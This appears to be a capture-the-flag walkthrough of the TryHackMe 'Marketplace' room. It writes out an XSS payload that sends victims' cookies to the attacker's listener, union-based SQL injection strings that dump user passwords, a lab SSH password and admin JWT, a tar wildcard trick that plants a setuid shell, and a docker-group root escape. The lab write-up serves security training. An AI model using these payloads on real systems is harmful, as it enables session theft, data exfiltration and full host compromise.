> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace.md).

# The Marketplace

**Room Link:** <https://tryhackme.com/room/marketplace>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="/files/B1cxnvXGxlmCmzq6In75" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="/files/EUvxT1f9ArNeahhb4Ygh" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

## TCP/32768 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/TFw2Rc5yYzxwQmJdK644" alt=""><figcaption></figcaption></figure>

## XSS - Steal JVT

<https://jwt.io/>

<figure><img src="/files/c76dxz1YGo89EZbJ9ewa" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QjIuCtQyfpSCfOlPAR8D" alt=""><figcaption></figcaption></figure>

I tried updating the token it didn't work

<figure><img src="/files/wzAqNdWzAz0UXdDKKz2i" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dhZI10AlVcc9hyj1ybJl" alt=""><figcaption></figcaption></figure>

Next we're going to try to steal the JWT from another user.

**Kali**

```
nc -lvnp 4444
```

**Browser**

```
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>
```

<figure><img src="/files/NFgOAQtfb7jmndwBgPUT" alt=""><figcaption></figcaption></figure>

This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button

<figure><img src="/files/4YdgzzkktKQHKMhS2x30" alt=""><figcaption></figcaption></figure>

we got a token from a user that isn't us

<figure><img src="/files/vk7aJKw2reCLiXbCDCbh" alt=""><figcaption></figcaption></figure>

We can see it is from Michael who is an admin.

<figure><img src="/files/7CCCmQdmXENWULdCeYeN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LtpUF9NBn5akWy5z35V4" alt=""><figcaption></figcaption></figure>

Sent again but this time just forwarded the request so we could see what that script was doing

<figure><img src="/files/zNLN0DB3IbN037txItTc" alt=""><figcaption></figcaption></figure>

The script was printing the flag

<figure><img src="/files/Qb5zz4yJtO1349IdA16j" alt=""><figcaption></figcaption></figure>

This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.

<figure><img src="/files/3D5fQV48YrTRiDJaGtew" alt=""><figcaption></figcaption></figure>

**Brower cookie**

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
```

We add a order by and increase the number until we get an error to reveal how many fields there are.

<figure><img src="/files/49nsEmuJn3zXp2Efhf2k" alt=""><figcaption></figcaption></figure>

After 5 it give us an error so we know there are four fields

<figure><img src="/files/Uu1borz2XsvDLHUPoEf2" alt=""><figcaption></figcaption></figure>

We do a union select, first to try to show our 1s which isn't working because the first part of the statement runs successfully so theres no where to put our info

<figure><img src="/files/jm13gMqsZuVI6JlhRyVI" alt=""><figcaption></figcaption></figure>

To work around this we make the userid as 0 which probably doesn't exist and we can start seeing our 1s

<figure><img src="/files/roMd77ysZOrGLy3CZ5zB" alt=""><figcaption></figcaption></figure>

Get Version

<figure><img src="/files/AMhPsg9PWYtnbdvtCoaN" alt=""><figcaption></figcaption></figure>

Get Database

<figure><img src="/files/ksjBeP7NUalg0bS0A9B3" alt=""><figcaption></figcaption></figure>

Get tables

```
UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database()
```

<figure><img src="/files/cjtNfUJRAsdBZyAhb2BF" alt=""><figcaption></figcaption></figure>

Get All tables by concat

```
-1 UNION SELECT group_concat(table_name),1,1,1%20 FROM information_schema.tables WHERE table_schema =database()
```

<figure><img src="/files/pt6UcJaAPJAjHslZ1fY8" alt=""><figcaption></figcaption></figure>

Get Columns for table users

```
-1%20UNION%20SELECT%20group_concat(column_name,column_type),1,1,1%20%20FROM%20information_schema.columns%20WHERE%20table_schema=marketplace
```

<figure><img src="/files/ZhzQaWH1rUyyNqajP37B" alt=""><figcaption></figcaption></figure>

Get Columns for table items

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace'
```

<figure><img src="/files/IhJxpiiG3FLaIK72I6uF" alt=""><figcaption></figcaption></figure>

Get Columns for table messages

```
-1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace'
```

<figure><img src="/files/KlFTyPtGBwwehG6Q5QEt" alt=""><figcaption></figcaption></figure>

Get Columns for table messages

```
-1%20UNION%20SELECT%20group_concat(message_content),1,1,1%20FROM%20messages
```

<figure><img src="/files/nNtXGns9S7EoUEDjaW0E" alt=""><figcaption></figcaption></figure>

Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames.

```
-1%20UNION%20SELECT%20group_concat(username,%27|%27,password),1,1,1%20FROM%20users
```

<figure><img src="/files/ctLFVNzAkSKFD2jkj1Ds" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/pkjVU8vOyeVCiPNTRpE2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/31oKA2OQe3JLVpEuKJUI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/hmf8ABLTQi3kT1pklCVU" alt=""><figcaption></figcaption></figure>

## TCP/22 - SSH

**Kali**

```
ssh jake@$VICTIM
Password: @b_ENXkGYUCAv3zJ
```

<figure><img src="/files/gfBJraqdDGcZWTJMBjKl" alt=""><figcaption></figcaption></figure>

## **Lateral Movement**

**Exploit:** <https://gtfobins.github.io/gtfobins/tar/>

Jake can run a backup script as michael. The script is using a wildcard which we manipulate.&#x20;

<figure><img src="/files/tdTIZl8r6zn6g6UTVvQk" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/12gyWkIGLLzGMkX2l2S5" alt=""><figcaption></figcaption></figure>

We can trick the script to run this to get a shell by making empty files with similar names

<figure><img src="/files/3TGPhnW1EtAS02TjeAZp" alt=""><figcaption></figcaption></figure>

**Victim**

```
cd /opt/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=sh shell.sh
vi shell.sh
```

**shell.sh**

```
#!/bin/bash

cp /bin/bash /opt/backups/michealbash;
chmod +xs  /opt/backups/michealbash;
```

**Victim**

```
chmod +x shell.sh 
rm -f ../backup.tar 
sudo -u michael /opt/backups/backup.sh 
```

<figure><img src="/files/k4Umi3Eu6GOTAVgiKtV8" alt=""><figcaption></figcaption></figure>

## **Privilege Escalation**

**Victim(micheal)**

```
id
find / -name docker.sock 2>/dev/null
docker images
docker run -it -v /:/host/ alpine chroot /host/ sh
```

michael is part of the docker group so it appears we're in a pod

<figure><img src="/files/n0eniqoaSipFMjsNkZor" alt=""><figcaption></figcaption></figure>

There a few images to test from. I just ran the last command above and changes the image name until it worked. Exploit worked with nginx and mysql images as well.

<figure><img src="/files/1f1kDx0JK8molhmypq7G" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Rug1ZrjbkApUZB6qg9MI" alt=""><figcaption></figcaption></figure>
